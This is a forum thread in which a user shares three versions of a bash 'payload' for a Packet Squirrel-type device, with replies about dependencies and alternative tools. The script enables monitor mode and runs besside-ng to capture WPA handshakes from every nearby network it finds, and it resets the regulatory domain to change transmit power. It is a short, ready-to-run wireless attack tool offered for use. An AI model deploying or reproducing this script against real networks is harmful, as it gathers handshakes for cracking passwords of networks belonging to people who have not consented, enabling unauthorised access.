PixL Posted December 15, 2017 Share Posted December 15, 2017 I've written my first payload....it should use besside-ng to capture as many WPA handshakes as it can find. #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside Link to comment Share on other sites More sharing options...
b0N3z Posted December 16, 2017 Share Posted December 16, 2017 Dependencies? Link to comment Share on other sites More sharing options...
Metasploit Posted December 16, 2017 Share Posted December 16, 2017 Congratulation for the first payload! Link to comment Share on other sites More sharing options...
PixL Posted December 16, 2017 Author Share Posted December 16, 2017 Dependencies would be aircrack-ng and a usb wifi adapter.... I think that's all it needs... believe besside-ng installs with aircrack. opkg install aircrack-ng <== that should do it Link to comment Share on other sites More sharing options...
PixL Posted December 23, 2017 Author Share Posted December 23, 2017 I'm wondering if Besside-ng may be a little outdated these days, it only captures M1 & M2 handshake. Actually the project below looks interesting and might be an idea to use instead. https://github.com/ZerBea/hcxtools Link to comment Share on other sites More sharing options...
PixL Posted December 23, 2017 Author Share Posted December 23, 2017 Maybe Sebkinne could advise on the best way to compile new binaries for the Packet Squirrel? Link to comment Share on other sites More sharing options...
PixL Posted December 25, 2017 Author Share Posted December 25, 2017 The slight update below should create a new capture file each time the Squirrel is started rather than appending to the old one. #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root/payloads/switch3 mkdir $RANDOM cd * besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside It assumes your using it in swtch3 Link to comment Share on other sites More sharing options...
PixL Posted December 29, 2017 Author Share Posted December 29, 2017 Updated again.... #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root/payloads/switch3 folder="$RANDOM" mkdir $folder cd $folder besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.